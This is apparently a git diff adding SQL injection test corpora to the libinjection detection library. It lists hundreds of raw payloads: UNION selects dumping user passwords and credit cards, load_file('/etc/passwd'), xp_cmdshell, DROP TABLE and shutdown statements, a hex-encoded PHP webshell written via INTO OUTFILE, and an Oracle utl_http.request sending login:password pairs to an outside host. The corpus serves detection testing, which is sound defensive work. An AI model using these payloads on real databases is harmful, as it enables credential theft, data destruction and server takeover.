_LATIN7'foo' union select * from foo
|
||||
_utf8'foo' union select * from foo
|
||||
|
||||
REAL 1 union select * from foo
|
||||
1::REAL union select * from foo
|
||||
1::REAL::REAL union select * from foo
|
||||
|
||||
-1 union select @``"", table_name from information_schema.tables
|
||||
!~1 union select table_name from information_schema.tables
|
||||
-1 union select @a`from 1`, table_name from information_schema.tables
|
||||
version() union select table_name from information_schema.tables
|
||||
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
|
||||
1 is unknown union select table_name from information_schema.tables
|
||||
true is not unknown for update union select table_name from information_schema.tables
|
||||
1 for update union select 1
|
||||
|
||||
# ht/ TK
|
||||
(true)-(true)union select table_name from information_schema.tables
|
||||
(@a)-(@a)union select table_name from information_schema.tables
|
||||
|
||||
# ht/ @stamparm
|
||||
1 OR (1 OR 1)--
|
||||
(1) OR (1 OR 1)--
|
||||
((1) OR (1 OR 1))--
|
||||
((1) OR ((1 OR 1)))--
|
||||
1 OR ((1 OR 1)) --
|
||||
1 OR ((1) OR 1) --
|
||||
|
||||
# ht/ @stamparm
|
||||
(@x OR @y) UNION ALL SELECT name,email,password FROM users--
|
||||
(@x OR (@y)) UNION ALL SELECT name,email,password FROM users--
|
||||
((@x) OR @y) UNION ALL SELECT name,email,password FROM users--
|
||||
(@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
|
||||
@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
|
||||
@x OR (@y) UNION ALL SELECT name,email,password FROM users--
|
||||
|
||||
# ht/ @stamparm
|
||||
(SELECT 1 FROM DUAL)
|
||||
(SELECT @a FROM DUAL) UNION ALL SELECT 1, 2, 3--
|
||||
(SELECT (1) FROM DUAL)
|
||||
(select @version from dual)
|
||||
(select (@version - 1) from dual)
|
||||
(select ('foo' - 1) from dual)
|
||||
(select 'foo' from dual)
|
||||
(select 1 foobar from dual)
|
||||
|
||||
# previously had problems with operators made from two words
|
||||
# ht/@stamparm
|
||||
1 and 1 not between 0 and 1
|
||||
1 AND 1 SOUNDS LIKE 1
|
||||
1 AND 1 NOT LIKE 0
|
||||
|
||||
(1 AND 1) OR 2>1--
|
||||
|
||||
# ht/@FluxReiners
|
||||
'-(1 or 1) and 1=0 union select load_file('/etc/passwd'),credit_card,password from users-- -
|
||||
'-(-1 or -1) and 1=0 union
|
||||
'-(-(1) or -1) and 1=0 union
|
||||
'-((1) or -1) and 1=0 union
|
||||
|
||||
# https://twitter.com/dsrbr/status/342132003270959104
|
||||
-1 union select null, listagg(login || ':' || pass,', ') within group (order by login) from users;
|
||||
-1 union select null, xmlagg(xmlelement("user",login || ':' || pass).getStringVal() from users;
|
||||
-1 union select null, stragg(login || ':' || pass ||', ') from users;
|
||||
|
||||
-1 union select listagg(login || ':' || pass,', ') within group (order by login) from users;
|
||||
|
||||
#ht ivan
|
||||
users.id%0D%0A%23asd%0D%0Aunion%0D%0A%23asd%0D%0Aselect%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aaa+%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Afrom%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aasdasd
|
||||
|
||||
# http://samincube.blogspot.ru/2013/06/time-based-sqli-on-google-coupon.html
|
||||
1'=sleep(1)='1
|
||||
|
||||
# https://twitter.com/dsrbr/status/343017094926962691
|
||||
1 and select (utl_http.request('http://client9.com/') || select listagg(login || chr(58) || pass || ', ') within group (order by login) from dual) is not null;
|
||||
|
||||
# https://twitter.com/dsrbr/status/341228356936814592
|
||||
-1 union select top 1 null, lead(pass, 0) over (order by pass) from users;
|
||||
|
||||
# https://twitter.com/dsrbr/status/340018970054766592
|
||||
-1 union select null, array_to_json(array_agg(users))::text from users limit 1;
|
||||
1 and (select array_to_json(array_agg(users))::text::bool from users limit 1;
|
||||
|
||||
# http://www.exploit-db.com/exploits/25915/
|
||||
' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e,null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php'
|
||||
|
||||
# http://blog.detectify.com/post/51651525114/the-ultimate-sql-injection-payload
|
||||
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
|
||||
|
||||
# misc secondary sql statements
|
||||
1 and true; BEGIN DECLARE @xy varchar(8000)
|
||||
1; BEGIN DECLARE @xy varchar(8000)
|
||||
x' and 1 = 0; BEGIN DECLARE
|
||||
x' AND 1=0; DROP TABLE TMP_DB;
|
||||
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S
|
||||
|
||||
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE
|
||||
|
||||
# https://twitter.com/st1ll_di3/status/344416764949561346
|
||||
# http://pastebin.com/Ymcs7nE0
|
||||
(--- 0)'=(currenT_user()-3) union select 1,2,3 from users; -- -
|
||||
|
||||
# example from http://www.websec.ca/kb/sql_injection
|
||||
1=1 AND-+-+-+-+~~((1))
|
||||
|
||||
# the bizarre sp_password hackery
|
||||
1-- foo sp_password
|
||||
1'--sp_password
|
||||
|
||||
# nice ms-access, courtesy mod-security
|
||||
foo' Eqv StrComp(username, 0x12+0x34+0xab+0xcd,0) Imp 'a
|
||||
|
||||
# mysql and pgsql string litterals
|
||||
b'1' UNION SELECT 1
|
||||
x'1' UNION SELECT 1
|
||||
n'1' UNION SELECT 1
|
||||
|
||||
# ending clauses
|
||||
1 having 1 limit 1 union select 1--
|
||||
1 having (1) limit 1 union select 1--
|
||||
1 having -(1) limit 1 union select 1--
|
||||
1 having sin(1) limit 1 union select 1--
|
||||
1 having 1 limit 2 group by 3 union select 1--
|
||||
1 group by 2 union select 1 --
|
||||
sin(1) group by 1 union select 1--
|
||||
@version group by 1 union select 1--
|
||||
@version group by (-1) union select 1--
|
||||
(@version) group by -1 union select 1--
|
||||
(@version) group by (-1) union select 1--
|
||||
(@version)) group by (-1) union select 1--
|
||||
(1)) group by (-1) union select 1--
|
||||
(@version) group by sin(-1) union select 1--
|
||||
1 group by sin(1) union select 1--
|
||||
1 group by 1 - sin(1) union select 1--
|
||||
1 group by (sin(1)) union select 1--
|
||||
-1 group by -(-sin(1)) union select 1--
|
||||
sin(1) group by (-sin(1)) union select 1--
|
||||
sin(1)-1 group by (-sin(1)) union select 1--
|
||||
sin(1)-1 group by 1 union select 1--
|
||||
1 group by ((1)) union select 1--
|
||||
1 group by (((1))) union select 1--
|
||||
((1)) group by (1) union select 1--
|
||||
(1) group by ((1)) union select 1--
|
||||
(1) group by (1) union select 1--
|
||||
|
||||
# more with 'having'
|
||||
-(1) is not unknown having 1 order by 1 limit 1 for update UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown for update UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown having 1 order by 1 limit 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is unknown having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) for update UNION select table_name from information_schema.tables limit 1
|
||||
1 for update UNION select table_name from information_schema.tables limit 1
|
||||
|
||||
-(1) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(true) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(null) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(\N) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(\N) for update having true UNION select table_name from information_schema.tables limit 1
|
||||
-(\N) for update having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) for update having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) having 1 for updateUNION select table_name from information_schema.tables limit 1
|
||||
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
|
||||
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
|
||||
|
||||
\''; DROP TABLE users; --
|
||||
\''); DROP TABLE users; --
|
||||
\''; /* one */ ;DROP TABLE users; --
|
||||
\''; select 1; drop table users; --
|
||||
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
|
||||
1; EXECUTE AS LOGIN 'root'; GO xp_cmdshell 'whoami.exe' ; REVERT ;
|
||||
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
|
||||
1); USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
|
||||
|
||||
EXEC sp_add_job @job_name = 'TestJob';
|
||||
EXECUTE sp_add_job @job_name = 'TestJob';
|
||||
1;EXECUTE sp_add_job @job_name = 'TestJob';
|
||||
1;print 'foo'; exec xp_cmdshell 'destroy';
|
||||
|
||||
# nested sub-selects
|
||||
-1 - (select (1 - select (select 1))) union all select 2 --
|
||||
-1 - (select 1) - union all select 2 --
|
||||
(select 1) - 1 union all select 2 --
|
||||
((select 1) - 1) + (select 1) union all select 2 --
|
||||
(select (select (select 1))) union all select 2 --
|
||||
(select (select (select 1))) union all select 2 --
|
||||
(select ((select (select 1))) union all select 2 --
|
||||
(select (select ((select 1))) union all select 2 --
|
||||
(select ((select 1 - (select 1))) union all select 2 --
|
||||
(select (select (((select 1))) union all select 2 --
|
||||
(select ((select (select 1))) union all select 2 --
|
||||
(select (((select (select 1))) union all select 2 --
|
||||
(select (select (1 - select 1))) union all select 2 --
|
||||
(select (select 1 - (select 1))) union all select 2 --
|
||||
(select 1 - (select 1 - (select 1))) union all select 2 --
|
||||
|
||||
# moar unions
|
||||
-1 union distinct select table_name from information_schema.tables
|
||||
-1 union distinct all select table_name from information_schema.tables
|
||||
-1 union all distinct select table_name from information_schema.tables
|
||||
-1 union all select table_name from information_schema.tables
|
||||
|
||||
# more
|
||||
if(1, -1, 2) union select table_name from information_schema.tables limit 1
|
||||
if((1), -1, 2) union select table_name from information_schema.tables limit 1
|
||||
if(1=2, -1, 2) union select table_name from information_schema.tables limit 1
|
||||
true in(2, (select 2)) union select table_name from information_schema.tables limit 1
|
||||
true in(2, 1) union select table_name from information_schema.tables limit 1
|
||||
|
||||
#
|
||||
-1 union select current_user``union select table_name from information_schema.tables
|
||||
|
||||
if(1, 1, 2) union select 3
|
||||
if(sin(1), 1, 2) union select 3
|
||||
if(1, sin(1), 2) union select 3
|
||||
if(1 - sin(1), 2) union select 3
|
||||
if((1), 1, 2) union select 3
|
||||
if(-(1), 1, 2) union select 3
|
||||
|
||||
#
|
||||
1; if exists ( /* anything */
|
||||
|
||||
# these aren't SQL but close enough
|
||||
union (select 1)--
|
||||
union all (select 1)--
|
||||
union all (select distinct 1)--
|
||||
union (select 1,2,3,4,5)--
|
||||
union (select -1,2,3,4,5)--
|
||||
union (select -(1),2,3,4,5)--
|
||||
union (select -sin(1),2,3,4,5)--
|
||||
1;call p(@version, @a)
|
||||
1;load data infile "foo"
|
||||
1;load xml infile "foo"
|
||||
1;load xml local infile "foo"
|
||||
1;load xml low_priority infile "foo"
|
||||
1;load xml concurrent infile "foo"
|
||||
1; delete from foo
|
||||
1; delete low_priority from foo
|
||||
1; delete quick from foo
|
||||
1; delete ignore from foo
|
||||
|
||||
|
||||
1;do (1=1)
|
||||
|
||||
-0b01 for update union select table_name from information_schema.tables limit 1
|
||||
binary _latin1 'true' COLLATE latin1_german2_ci is not unknown union select table_name from information_schema.tables
|
||||
binary true COLLATE latin1_german2_ci union select table_name from information_schema.tables
|
||||
1<binary 1>2 union select table_name from information_schema.tables limit 1
|
||||
binary 1 < binary 2 > binary 3 union select table_name from information_schema.tables limit 1
|
||||
|
||||
binary (false) union select table_name from information_schema.tables limit 1
|
||||
1 - binary (false) union select table_name from information_schema.tables limit 1
|
||||
1 - (binary (false)) union select table_name from information_schema.tables limit 1
|
||||
binary binary 1 union select table_name from information_schema.tables
|
||||
binary -1 union select table_name from information_schema.tables
|
||||
binary -(1) union select table_name from information_schema.tables
|
||||
binary (binary 1) union select table_name from information_schema.tables
|
||||
binary (binary 1) union select table_name from information_schema.tables
|
||||
|
||||
# werid slash escaping in Older T-SQL databases
|
||||
# http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
|
||||
\1=\1AND\1=\1;
|
||||
|
||||
# more weird T-SQL weirdness
|
||||
\%250=\-1AND\*1=\/1
|
||||
|
||||
# mysql
|
||||
-1 procedure analyse() union select table_name from information_schema.tables limit 1
|
||||
|
||||
# HT @FluxReiners
|
||||
(1)mod @a or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
|
||||
@a mod (1) or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
|
||||
|
||||
# HT @LightOS
|
||||
# issue here is how '1gfsdg..' is processed.
|
||||
# MySQL parses it as a single word, other databases treat it as "1", "gfs..."
|
||||
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
|
||||
|
||||
# HT @FluxReiners
|
||||
(select 1 foo) union select load_file('foo');
|
||||
|
||||
#
|
||||
# Anonymous from Research Institution of Telecom in Beijing, China
|
||||
# commenting out since i have no idea how this could be a true SQL injection
|
||||
#=1 union select admin,pass from admin limit 1
|
||||
#=1 union select 1,2,3,4,5,6
|
||||
|
||||
# problems with type-casting, and nested type casting
|
||||
#
|
||||
# credit: Reto Ischi
|
||||
#
|
||||
's' || binary(1)# and n='foo"
|
||||
1 - binary (1 - binary(1)) UNION SELECT 2 --
|
||||
1 - binary (binary(1) -1) UNION SELECT 2 --
|
||||
binary (1 - binary(1)) UNION SELECT 2 --
|
||||
binary (binary(1) - 1) UNION SELECT 2 --
|
||||
binary (binary(1)) UNION SELECT 2 --
|
||||
|
||||
#
|
||||
# Padding using between operator
|
||||
#
|
||||
(1 between @version and "2") & 1 UNION SELECT 1
|
||||
(1 between @version and @user) & 1 UNION SELECT 1
|
||||
(1 between 1 and @version) & 1 UNION SELECT 1
|
||||
(1 between '1' and @version) & 1 UNION SELECT 1
|
||||
(1 between 1 and 2) & 1 UNION SELECT 1
|
||||
(1 between '1' and '2') & 1 UNION SELECT 1
|
||||
(1 between 1 and '2') & 1 UNION SELECT 1
|
||||
(1 between '1' and 2) & 1 UNION SELECT 1
|
||||
('1' between '1' and '2') & 1 UNION SELECT 1
|
||||
(@version between '1' and '2') & 1 UNION SELECT 1
|
||||
(@version between 1 and '2') & 1 UNION SELECT 1
|
||||
|
||||
#
|
||||
# ANY and SOME subqueries
|
||||
#
|
||||
1 - ANY(SELECT 1,2)
|
||||
ANY(SELECT 1) - 1 UNION ALL --
|
||||
ANY(SELECT (1)) - 1 UNION ALL --
|
||||
ANY((SELECT 1)) - 1 UNION ALL --
|
||||
1 - ANY(SELECT 1) UNION ALL --
|
||||
|
||||
#
|
||||
# embedded %A0 mysql
|
||||
#
|
||||
1%A0UNION%A0SELECT%A02--
|
||||
1%00UNION%00SELECT%002--
|
||||
|
||||
#
|
||||
# http://www.exploit-db.com/exploits/28854/
|
||||
#
|
||||
stringindatasetchoosen%25' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%25dministrator' and rownum<=1 and PASSWORD like '0%25') and '1%25'='1
|
||||
|
||||
#
|
||||
# Thanks to @rsalgado
|
||||
# A degenerate MySQL ODBC case
|
||||
#
|
||||
-{``.``.id} union select table_name FROM information_schema.tables LIMIT 1
|
132
libinjection/data/sqli-mysql-implicit.txt
Normal file
132
libinjection/data/sqli-mysql-implicit.txt
Normal file
|
@ -0,0 +1,132 @@
|
|||
# mysql implicit conversions tests
|
||||
A' AND 'B
|
||||
A 'AND' B
|
||||
'AND'
|
||||
' AND '
|
||||
A' && 'B
|
||||
A '&&' B
|
||||
'&&'
|
||||
' && '
|
||||
A' = 'B
|
||||
A '=' B
|
||||
'='
|
||||
' = '
|
||||
A' & 'B
|
||||
A '&' B
|
||||
'&'
|
||||
' & '
|
||||
A' | 'B
|
||||
A '|' B
|
||||
'|'
|
||||
' | '
|
||||
A' ^ 'B
|
||||
A '^' B
|
||||
'^'
|
||||
' ^ '
|
||||
A' DIV 'B
|
||||
A 'DIV' B
|
||||
'DIV'
|
||||
' DIV '
|
||||
A' / 'B
|
||||
A '/' B
|
||||
'/'
|
||||
' / '
|
||||
A' <=> 'B
|
||||
A '<=>' B
|
||||
'<=>'
|
||||
' <=> '
|
||||
A' >= 'B
|
||||
A '>=' B
|
||||
'>='
|
||||
' >= '
|
||||
A' > 'B
|
||||
A '>' B
|
||||
'>'
|
||||
' > '
|
||||
A' << 'B
|
||||
A '<<' B
|
||||
'<<'
|
||||
' << '
|
||||
A' <= 'B
|
||||
A '<=' B
|
||||
'<='
|
||||
' <= '
|
||||
A' < 'B
|
||||
A '<' B
|
||||
'<'
|
||||
' < '
|
||||
A' LIKE 'B
|
||||
|
||||
# common false positive
|
||||
#A 'LIKE' B
|
||||
#'LIKE'
|
||||
#' LIKE '
|
||||
|
||||
A' - 'B
|
||||
A '-' B
|
||||
'-'
|
||||
' - '
|
||||
A' %25 'B
|
||||
A '%25' B
|
||||
'%25'
|
||||
' %25 '
|
||||
A' MOD 'B
|
||||
A 'MOD' B
|
||||
'MOD'
|
||||
' MOD '
|
||||
A' != 'B
|
||||
A '!=' B
|
||||
'!='
|
||||
' != '
|
||||
A' <> 'B
|
||||
A '<>' B
|
||||
'<>'
|
||||
' <> '
|
||||
A' NOT LIKE 'B
|
||||
A 'NOT LIKE' B
|
||||
'NOT LIKE'
|
||||
' NOT LIKE '
|
||||
A' NOT REGEXP 'B
|
||||
A 'NOT REGEXP' B
|
||||
'NOT REGEXP'
|
||||
' NOT REGEXP '
|
||||
A' OR 'B
|
||||
A 'OR' B
|
||||
'OR'
|
||||
' OR '
|
||||
A' || 'B
|
||||
A '||' B
|
||||
'||'
|
||||
' || '
|
||||
A' %2B 'B
|
||||
A '%2B' B
|
||||
'%2B'
|
||||
' %2B '
|
||||
A' REGEXP 'B
|
||||
A 'REGEXP' B
|
||||
'REGEXP'
|
||||
' REGEXP '
|
||||
A' >> 'B
|
||||
A '>>' B
|
||||
'>>'
|
||||
' >> '
|
||||
A' RLIKE 'B
|
||||
A 'RLIKE' B
|
||||
'RLIKE'
|
||||
' RLIKE '
|
||||
A' NOT RLIKE 'B
|
||||
A 'NOT RLIKE' B
|
||||
'NOT RLIKE'
|
||||
' NOT RLIKE '
|
||||
A' SOUNDS LIKE 'B
|
||||
A 'SOUNDS LIKE' B
|
||||
'SOUNDS LIKE'
|
||||
' SOUNDS LIKE '
|
||||
A' * 'B
|
||||
A '*' B
|
||||
'*'
|
||||
' * '
|
||||
A' XOR 'B
|
||||
A 'XOR' B
|
||||
'XOR'
|
||||
' XOR '
|
275
libinjection/data/sqli-phpids.txt
Normal file
275
libinjection/data/sqli-phpids.txt
Normal file
|
@ -0,0 +1,275 @@
|
|||
#
|
||||
# Various samples from PHPIDS
|
||||
#
|
||||
%22+OR+1%3D1%23
|
||||
%3B+DROP+table+Users+--
|
||||
admin%27--
|
||||
SELECT+%2F%2A%2132302+1%2F0%2C+%2A%2F+1+FROM+tablename
|
||||
10%3BDROP+members+--
|
||||
SELECT+CHAR%280x66%29
|
||||
SELECT+LOAD_FILE%280x633A5C626F6F742E696E69%29
|
||||
EXEC%28%40stored_proc+%40param%29
|
||||
chr%2811%29%7C%7Cchr%2812%29%7C%7Cchar%2813%29
|
||||
1+or+name+like+%27%25%27
|
||||
1+OR+%271%27%21%3D0
|
||||
1+OR+ASCII%282%29+%3D+ASCII%282%29
|
||||
1%27+OR+1%26%221
|
||||
1%27+OR+%271%27+XOR+%270
|
||||
1+OR%2B1%3D1
|
||||
1+OR%2B%281%29%3D%281%29
|
||||
aaa%27+or+%281%29%3D%281%29+%23%21asd
|
||||
aaa%27+OR+%281%29+IS+NOT+NULL+%23%21asd
|
||||
a%27+or+1%3D%271
|
||||
asd%27+union+%28select+username%2Cpassword+from+admins%29+where+id%3D%271
|
||||
1%27%3B+WAITFOR+TIME+%2717%3A48%3A00+%27+shutdown+--+-a
|
||||
1%27%3B+anything%3A+goto+anything+--+-a
|
||||
%27+%3D%2B+%27
|
||||
asd%27+%3D-+%28-%27asd%27%29+--+-a
|
||||
aa%22in%2B+%28%22aa%22%29+or+-1+%21%3D+%220
|
||||
aa%22+%3D%2B+-+%220++
|
||||
aa%27+LIKE+0+--+-a
|
||||
aa%27+LIKE+md5%281%29+or+%271
|
||||
aa%27+REGEXP-+md5%281%29+or+%271
|
||||
aa%27+DIV%401+%3D+0+or+%271
|
||||
aa%27+XOR-+column+%21%3D+-%270
|
||||
union+select+password+from+users+where+1
|
||||
str%27%3Dversion%28%29%0A%09%09%09%09%09%09UNION%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09SELECT+group_concat%28table_name%29%23%0A%09%09%09%09%09%09%23%23%0A%09%09%09%09%09%09%2F%2A%21FROM%2A%2F+information_schema.tables+WHERE+%271
|
||||
asd%22or-1%3D%22-1
|
||||
asd%22or%211%3D%22%211
|
||||
asd%22or%21%281%29%3D%221
|
||||
asd%22or%401%3D%22%401
|
||||
asd%22or-1+XOR%220
|
||||
asd%22+or+ascii%281%29%3D%2249
|
||||
asd%22+or+md5%281%29%5E%221
|
||||
asd%22+or+table.column%5E%221
|
||||
asd%22+or+%40%40version%5E%220
|
||||
asd%22+or+%40%40global.hot_cache.key_buffer_size%5E%221
|
||||
1%22OR%21%22a
|
||||
1%22OR%21%220
|
||||
1%22OR-%221
|
||||
1%22OR%40%221%22+IS+NULL+%231+%21+%28with+unfiltered+comment+by+tx+%3B%29
|
||||
1%22OR%21%28false%29+%231+%21
|
||||
1%22OR-%28true%29+%23a+%21
|
||||
1%22+INTO+OUTFILE+%22C%3A%2Fwebserver%2Fwww%2Freadme.php
|
||||
asd%27+or+md5%285%29%5E%271+
|
||||
asd%27+or+column%5E%27-1+
|
||||
asd%27+or+true+--+a
|
||||
%5C%22asd%22+or+1%3D%221
|
||||
a+1%27+or+if%28-1%3D-1%2Ctrue%2Cfalse%29%23%21
|
||||
aa%5C%5C%22aaa%27+or+%271
|
||||
%27+or+id%3D+1+having+1+%231+%21
|
||||
%27+or+id%3D+2-1+having+1+%231+%21
|
||||
aa%27or+null+is+null+%23%28
|
||||
aa%27or+current_user%21%3D%27+1
|
||||
aa%27or+BINARY+1%3D+%271
|
||||
aa%27or+LOCALTIME%21%3D%270
|
||||
aa%27like-%27aa
|
||||
aa%27is%5CN%7C%21%27
|
||||
%27is%5CN-%21%27
|
||||
asd%27%7Ccolumn%26%26%271
|
||||
asd%27%7Ccolumn%21%3D%27
|
||||
aa%27or+column%3Dcolumn+--+%23aa
|
||||
aa%27or+column%2Acolumn%21%3D%270
|
||||
aa%27or+column+like+column+--+%23a
|
||||
0%27%2Acolumn+is+%5CN+-+%271
|
||||
1%27%2Acolumn+is+%5CN+or+%271
|
||||
1%27%2A%40a+is+%5CN+-+%27
|
||||
1%27%2A%40a+is+%5CN+or+%271
|
||||
1%27+-1+or%2B1%3D+%27%2B1+
|
||||
1%27+-1+-+column+or+%271+
|
||||
1%27+-1+or+%271
|
||||
+%281%29or%281%29%3D%281%29+
|
||||
fo%22o%27or%271
|
||||
%27+OR+UserID+IS+NOT+2
|
||||
%27+OR+UserID+IS+NOT+NULL
|
||||
%27+OR+UserID+%3E+1
|
||||
%27++OR+UserID+RLIKE++%27.%2B%27+
|
||||
%27OR+UserID+%3C%3E+2
|
||||
1%27+union+%28select+password+from+users%29+--+-a
|
||||
1%27+union+%28select%271%27%2C%272%27%2Cpassword+from+users%29+--+-a
|
||||
1%27+union+all+%28select%271%27%2Cpassword+from+users%29+--+-a
|
||||
aa%27%21%3D%271
|
||||
aa%27%21%3D%7E%271
|
||||
aa%27%3D%28%27aa%27%29%23%28
|
||||
aa%27%7C%2B%271
|
||||
aa%27%7C%21%27aa
|
||||
aa%27%5E%21%27aa+
|
||||
abc%27+%3D+%21%21%270
|
||||
abc%27+%3D+%21%21%21%21%270
|
||||
abc%27+%3D+%21%21%21%21%21%21%21%21%21%21%21%21%21%21%270
|
||||
abc%27+%3D+%210+%3D+%21%21%270
|
||||
abc%27+%3D+%210+%21%3D+%21%21%21%270
|
||||
abc%27+%3D+%21%2B0+%21%3D+%21%270+
|
||||
aa%27%3D%2B%271
|
||||
%27%3Bif+1%3D1+drop+database+test--+-a
|
||||
%27%3Bif+1%3D1+drop+table+users--+-a
|
||||
%27%3Bif+1%3D1+shutdown--+-a
|
||||
%27%3B+while+1%3D1+shutdown--+-a
|
||||
%27%3B+begin+shutdown+end--+-a+
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D+%211+div+1%2B%27
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%211+div+1%2B%27
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%21%40%40version+div+%40%40version%2B%27
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D%2B1+%3D+%21true+div+%40%40version%2B%27
|
||||
foo%27div+count%28select%60pass%60from%28users%29where+mid%28pass%2C1%2C1%29rlike+lower%28conv%2810%2Cpi%28%29%2Api%28%29%2Cpi%28%29%2Api%28%29%29%29+%29-%270
|
||||
1-%23canvas%0A++++++++++++++++++++++++%28SELECT+1%2A1+from%28information_schema.tables%29+group+by+table_name+having+-+left%28hex%28table_name%29%2Ctrue%29+%3D+-7%29
|
||||
str%23%27+UNION+SELECT+group_concat%28table_name%29%0A++++++++++++++++++++++++FROM%60information_schema%60.tables
|
||||
aa%27in+%280%29%23%28
|
||||
aa%27%21%3Dascii%281%29%23%28
|
||||
%27+or+SOUNDEX+%281%29+%21%3D+%270
|
||||
aa%27RLIKE+BINARY+0%23%28
|
||||
aa%27or+column%21%3D%271
|
||||
aa%27or+column+DIV+0+%3D0+%23
|
||||
aa%27or+column%2B%281%29%3D%271
|
||||
aa%27or+0%21%3D%270
|
||||
aa%27LIKE%270
|
||||
aa%27or+id+%3D%27%5C%27
|
||||
1%27%3Bdeclare+%40%23+int%3Bshutdown%3Bset+%40%23+%3D+%271
|
||||
1%27%3Bdeclare+%40%40+int%3Bshutdown%3Bset+%40%40+%3D+%271
|
||||
asd%27+or+column%26%26%271
|
||||
asd%27+or+column%3D+%211+and%2B1%3D%271
|
||||
aa%27%21%3Dascii%281%29+or-1%3D-%271
|
||||
a%27IS+NOT+NULL+or%2B1%3D%2B%271
|
||||
aa%27in%28%27aa%27%29+or-1%21%3D%270
|
||||
aa%27+or+column%3D%2B%211+%231
|
||||
aa%27+SOUNDS+like%2B%271
|
||||
aa%27+REGEXP%2B%270
|
||||
aa%27+like%2B%270
|
||||
-1%27%3D-%27%2B1
|
||||
%27%3D%2B%27
|
||||
aa%27+or+stringcolumn%3D+%2B%211+%231+
|
||||
aa%27+or+anycolumn+%5E+-%271
|
||||
aa%27+or+intcolumn+%26%26+%271
|
||||
asd%27+or+column%26%26%271
|
||||
asd%27+or+column%3D+%211+and%2B1%3D%271
|
||||
aa%27+or+column%3D%2B%211+%231
|
||||
aa%27IS+NOT+NULL+or%2B1%5E%2B%270
|
||||
aa%27IS+NOT+NULL+or+%2B1-1+xor%270
|
||||
aa%27IS+NOT+NULL+or%2B2-1-1-1+%21%3D%270
|
||||
aa%27%7C1%2B1%3D%282%29Or%281%29%3D%271
|
||||
aa%27%7C3%21%3D%274
|
||||
aa%27%7Cascii%281%29%2B1%21%3D%271
|
||||
aa%27%7CLOCALTIME%2A0%21%3D%271+
|
||||
asd%27+%7C1+%21%3D+%281%29%23aa
|
||||
%27+is+99999+%3D+%27
|
||||
%27+is+0.00000000000+%3D+%27
|
||||
1%27%2Acolumn-0-%270
|
||||
1%27-%40a+or%271
|
||||
a%27-%40a%3D%40a+or%271
|
||||
aa%27+%2A%40var+or+1+SOUNDS+LIKE+%281%29%7C%271
|
||||
aa%27+%2A%40var+or+1+RLIKE+%281%29%7C%271+
|
||||
a%27+or%7Ecolumn+like+%7E1%7C%271
|
||||
%27%3C%7E%27
|
||||
a%27-1.and+%271
|
||||
aa%27%2F1+DIV+1+or%2B1%3D%2B%271+
|
||||
aa%27%260%2B1%3D%27aa
|
||||
aa%27+like%280%29+%2B+1--+-a+
|
||||
aa%27%5E0%2B0%3D%270
|
||||
aa%27%5E0%2B0%2B1-1%3D%280%29--+-a
|
||||
aa%27%3C3%2B1+or%2B1%3D%2B%271
|
||||
aa%27%251%2B0%3D%270
|
||||
%27%2F1%2F1%3D%27
|
||||
+aa%27%2F1+or+%271
|
||||
+aa1%27+%2A+%40a+or+%271+%27%2F1+regexp+%270
|
||||
+%27+%2F+1+%2F+1+%3D%27
|
||||
+%27%2F1%3D%27
|
||||
+aa%27%260%2B1+%3D+%27aa
|
||||
+aa%27%26%2B1%3D%27aa
|
||||
+aa%27%26%281%29%3D%27aa
|
||||
+aa%27%5E0%2B0+%3D+%270
|
||||
+aa%27%5E0%2B0%2B1-1+%3D+%280%29--+-a
|
||||
+aa%27%5E%2B-3+or%271
|
||||
+aa%27%5E0%21%3D%271
|
||||
+aa%27%5E%280%29%3D%270
|
||||
+aa%27+%3C+%283%29+or+%271
|
||||
+aa%27+%3C%3C3+or%271
|
||||
+aa%27-%2B%211+or+%271
|
||||
+aa%27-%211+like%270
|
||||
